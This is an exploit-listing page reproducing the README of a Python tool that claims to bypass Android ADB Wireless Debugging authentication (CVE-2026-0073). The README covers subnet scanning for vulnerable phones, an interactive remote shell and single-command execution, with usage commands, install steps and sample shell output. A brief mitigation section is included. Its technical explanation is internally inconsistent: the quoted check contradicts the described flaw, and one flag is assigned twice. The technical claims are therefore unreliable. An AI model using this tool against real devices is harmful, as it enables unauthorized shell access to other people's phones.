Share
## https://sploitus.com/exploit?id=3A682AC4-8730-5460-A9DE-44CE103E4423
# ๐Ÿ”“ CVE-2026-0073 - Android ADB Wireless Debugging Auth Bypass

[![Python](https://img.shields.io/badge/Python-3.8%2B-blue.svg)](https://www.python.org/)
[![CVSS](https://img.shields.io/badge/CVSS-8.8%20HIGH-red.svg)](https://nvd.nist.gov/vuln/detail/CVE-2026-0073)
[![License](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE)
[![Educational](https://img.shields.io/badge/Purpose-Educational%20Only-yellow.svg)](https://github.com/)

> **Zero-Click | Remote Shell | Network Scanner | Educational Security Research Tool**

---

## ๐ŸŽฏ Overview

CVE-2026-0073 is a critical authentication bypass vulnerability in Android's ADB daemon affecting **Wireless Debugging** on Android 11+ devices. The flaw resides in the TLS certificate verification logic where a type confusion in `EVP_PKEY_cmp()` allows attackers to bypass authentication by presenting an **EC P-256** or **Ed25519** certificate against a device configured with an RSA key.

This PoC demonstrates the vulnerability for **authorized security research and educational purposes only.**

---

## โœจ Features

| Feature | Description |
|---------|-------------|
| ๐Ÿ” **Smart Port Discovery** | Automatically scans 30000-50000 range + common ports, verifies ADB via CNXN handshake |
| ๐Ÿ” **TLS 1.3 Bypass** | Exploits type confusion in `EVP_PKEY_cmp()` for authentication bypass |
| ๐ŸŽจ **Dual Key Support** | EC P-256 (default) or Ed25519 certificates |
| ๐Ÿš **Interactive Shell** | Full terminal access with thread-based I/O |
| โšก **Single Command Mode** | Execute one command and exit - perfect for scripting |
| ๐Ÿ“ก **Network Scanner** | Scan entire subnet for vulnerable devices |
| ๐Ÿ”„ **Auto Retry** | Exponential backoff + configurable max retries |
| ๐ŸŽฏ **Manual Port Override** | Specify port when auto-discovery fails |
| ๐Ÿ“ **Output Capture** | Save command results to file |
| ๐ŸŽจ **Colorized Output** | Professional visual feedback via colorama |
| ๐Ÿชต **Verbose Debug** | Detailed logging for troubleshooting |
| ๐Ÿ”Œ **Proxy Support** | HTTP/HTTPS proxy compatibility |
| ๐Ÿงต **Threaded Shell** | Non-blocking interactive session |

---

## ๐Ÿ“ฆ Installation

๐Ÿš€ Usage Examples
Basic - One Shot Exploit
bash

python exploit.py --target 192.168.1.100

Interactive Shell
bash

python exploit.py -t 192.168.1.100 -i

Execute Single Command
bash

python exploit.py -t 192.168.1.100 -c "id" -o result.txt

Scan Entire Network
bash

python exploit.py --scan --interface eth0

Manual Port + Verbose
bash

python exploit.py -t 192.168.1.100 -p 39311 -v

Ed25519 Certificate
bash

python exploit.py -t 192.168.1.100 --key-type ed25519

Non-Interactive Mode (Exit After Command)
bash

python exploit.py -t 192.168.1.100 -c "whoami" --no-interactive

โš™๏ธ Command Line Arguments
Argument	Short	Default	Description
--target	-t	None	Target IP address
--port	-p	Auto	Wireless Debugging port
--command	-c	None	Execute single command
--output	-o	None	Save output to file
--verbose	-v	False	Enable debug logging
--interactive	-i	True	Interactive shell mode
--no-interactive	-	False	Exit after command execution
--scan	-	False	Scan network for vulnerable devices
--interface	-i	None	Network interface for scanning
--key-type	-	ec	Certificate type (ec or ed25519)
--max-retries	-	3	Maximum retry attempts
--no-auto-port	-	False	Disable automatic port discovery
๐Ÿง  Technical Deep Dive
Vulnerability Root Cause

The vulnerability exists in adbd's TLS certificate verification:
c

// Vulnerable code in adbd_tls_verify_cert()
if (EVP_PKEY_cmp(registered_key, presented_key) == 1) {
    // Authentication success
}

When EVP_PKEY_cmp() compares keys of different types (RSA vs EC), it returns -1. The code treats any non-zero return as success, causing authentication bypass.
Exploit Flow
text

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  1. ๐Ÿ” PORT DISCOVERY                                           โ”‚
โ”‚     โ”œโ”€โ”€ Scan 30000-50000 + common wireless ports               โ”‚
โ”‚     โ””โ”€โ”€ Verify ADB via CNXN handshake                           โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  2. ๐Ÿ” TLS HANDSHAKE                                            โ”‚
โ”‚     โ”œโ”€โ”€ Generate EC P-256 or Ed25519 certificate               โ”‚
โ”‚     โ”œโ”€โ”€ Establish TLS 1.3 connection                           โ”‚
โ”‚     โ””โ”€โ”€ Present certificate to device                          โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  3. ๐Ÿ’€ AUTHENTICATION BYPASS                                    โ”‚
โ”‚     โ”œโ”€โ”€ Send CNXN message                                       โ”‚
โ”‚     โ”œโ”€โ”€ If AUTH requested โ†’ sign token with private key        โ”‚
โ”‚     โ””โ”€โ”€ Type confusion โ†’ device grants access                  โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  4. ๐Ÿš SHELL ACCESS                                             โ”‚
โ”‚     โ”œโ”€โ”€ Open "shell:" service                                   โ”‚
โ”‚     โ”œโ”€โ”€ Interactive terminal OR single command                 โ”‚
โ”‚     โ””โ”€โ”€ Maintain session with keep-alive                       โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

๐Ÿ“ธ Example Output
text

$ python exploit.py --target 192.168.1.100 -v

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘     CVE-2026-0073 - Android ADB Daemon TLS Authentication Bypass Exploit     โ•‘
โ•‘           Wireless Debugging STLS Path - Zero-Click Remote Shell             โ•‘
โ•‘                              CVSS 8.8 - HIGH                                 โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[11:23:15] Attempting to discover Wireless Debugging port...
[11:23:16] Found valid Wireless Debugging port: 39311 โœ“
[11:23:16] Exploiting 192.168.1.100:39311 (Wireless Debugging)
[11:23:17] TLS handshake completed โœ“
[11:23:17] CNXN received - authentication bypass successful โœ“
[11:23:17] Shell opened โœ“
[11:23:17] Interactive shell - type 'exit' to quit

android:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),...
android:/ $ 

โš ๏ธ Important Notes
Item	Details
Affected Versions	Android 11, 12, 13, 14, 15 with Wireless Debugging enabled
Required Condition	Wireless Debugging turned ON in Developer Options
Attack Surface	Adjacent network (same WiFi/subnet)
Not Affected	Traditional adb tcpip 5555 mode (uses different code path)
Detection	Monitor TLS handshakes with EC certificates on high ports
๐Ÿ›ก๏ธ Mitigation

    Apply Android security bulletin patches for CVE-2026-0073

    Disable Wireless Debugging when not in use

    Use USB debugging instead of wireless mode

    Monitor network for unexpected EC certificate handshakes


git clone https://github.com/yourusername/CVE-2026-0073-Exploit.git
cd CVE-2026-0073-Exploit
pip install cryptography colorama netifaces